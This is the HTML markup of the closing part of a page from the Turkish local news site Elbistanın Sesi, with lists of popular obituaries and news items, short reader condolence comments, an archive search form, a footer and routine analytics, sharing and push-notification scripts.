></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/ekinozulu-sehidin-aci-haberi-baba-ocagina-ulasti-h65637.html" title="" ><span class="en-hit">4.</span> <strong>Ekinözülü şehidin acı haberi baba...</strong> <span class="en-spot en-hidden">Barış Pınarı Harekatı kapsamında Suriye’nin Tel Abyad bölgesinde...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/prof-dr-gorur-kahramanmaras-ve-karliova-ya-dogru-tehdit-artti-h65537.html" title="Prof. Dr. Görür: Kahramanmaraş..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/prof_dr_gorur_kahramanmaras_ve_karliova_ya_dogru_tehdit_artti_h65537_84f17.jpg" alt="Prof. Dr. Görür: Kahramanmaraş..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/prof-dr-gorur-kahramanmaras-ve-karliova-ya-dogru-tehdit-artti-h65537.html" title="" ><span class="en-hit">5.</span> <strong>Prof. Dr. Görür: “Kahramanmaraş...</strong> <span class="en-spot en-hidden">Elazığ&#039;da meydana gelen 6.8 büyüklüğündeki depremi önceden...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/nurettin-ozgur-h65512.html" title="Nurettin ÖZGÜR" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/nurettin_ozgur_h65512_3d531.jpeg" alt="Nurettin ÖZGÜR"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/nurettin-ozgur-h65512.html" title="" ><span class="en-hit">1.</span> <strong>Nurettin ÖZGÜR</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/cevdet-temel-69-yasinda-h65727.html" title="Cevdet TEMEL 69 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/cevdet_temel_69_yasinda_h65727_12cc9.jpg" alt="Cevdet TEMEL 69 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/cevdet-temel-69-yasinda-h65727.html" title="" ><span class="en-hit">2.</span> <strong>Cevdet TEMEL 69 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/yagci-osman-sacan-70-yasinda-h65689.html" title="Yağcı Osman Saçan 70 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/yagci_osman_sacan_70_yasinda_h65689_479be.jpg" alt="Yağcı Osman Saçan 70 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/yagci-osman-sacan-70-yasinda-h65689.html" title="" ><span class="en-hit">3.</span> <strong>Yağcı Osman Saçan 70 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/recep-yekta-h65454.html" title="Recep Yekta" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/recep_yekta_h65454_a088b.jpg" alt="Recep Yekta"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/recep-yekta-h65454.html" title="" ><span class="en-hit">4.</span> <strong>Recep Yekta</strong> <span class="en-spot en-hidden">Recep Yekta</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/aliye-uzman-h65697.html" title="Aliye Uzman" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/aliye_uzman_h65697_3b9c1.jpg" alt="Aliye Uzman"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/aliye-uzman-h65697.html" title="" ><span class="en-hit">5.</span> <strong>Aliye Uzman</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-karakas-69-yasinda-h65679.html#comment_290056" title="" >Allah rahmet eylesin mekanı cennet olsun....</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-unsal-71-yasinda-h65771.html#comment_290055" title="" >Allah rahmet eylesin Hasan abiye. Yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-odemis-77-yasinda-h65770.html#comment_290053" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistan-belediyesi-genclik-ve-spor-hizmetleri-mudurlugu-bokeye-emanet-h65766.html#comment_290052" title="" >İnşAllah memleketimize spor alanında...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-unsal-71-yasinda-h65771.html#comment_290051" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-unsal-71-yasinda-h65771.html#comment_290050" title="" >Allahım rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-unsal-71-yasinda-h65771.html#comment_290049" title="" >Allahım ölen merhuma rahmet sizlere de...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/recep-ates-79-yasinda-h65752.html#comment_290048" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/kahramanmaras-in-kurtulusunun-100yili-serik-te-kutlandi-h65709.html#comment_290047" title="" >Kahramanmaşlılar derneği başkanı yunus...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/tokinin-yapacagi-sosyal-konut-kurasi-22-nisanda-cekilecek-h65755.html#comment_290046" title="" >İsimler belli oldumu nerden öğrenebiliriz</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-unsal-71-yasinda-h65771.html#comment_290044" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-onemli-bir-egitim-hizmetine-daha-kavusuyoruz-h65761.html#comment_290043" title="" >elbistanayatırımyapılsınelbistendiiçšizligiüönlemeķicinyatırımyapılsınzenginişdadamlarınelbistanayatırımyapsınelbistanın1milyonnuf...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/fikriye-kilinc-h65769.html#comment_290042" title="" >Değerli Halaoğlumuz Recep Hocamızın...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/aliye-uzman-h65697.html#comment_290041" title="" >Akrabamız, değerli insan Aliye ablamıza...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/yagci-osman-sacan-70-yasinda-h65689.html#comment_290040" title="" >Allah rahmet eylesin</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-unsal-71-yasinda-h65771.html#comment_290039" title="" >ALLAH RAHMED EYLESİN MEKANI CENNET OLSUN...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/adil-olker-41-yasinda-h65760.html#comment_290038" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-odemis-77-yasinda-h65770.html#comment_290037" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/adil-olker-41-yasinda-h65760.html#comment_290036" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/nurhakta-kadinlar-pecic-turnuvasinda-yaristi-h65768.html#comment_290035" title="" >Bu tür faliyetler nurhak&#39;&#39;ın ne...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" selected>20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" selected>Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2020" selected>2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2020 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Ahmet Ödemiş 77 yaşında" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> gazete@elbistaninsesi.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fvefatlar%2Fahmet-odemis-77-yasinda-h65770.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('65770', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 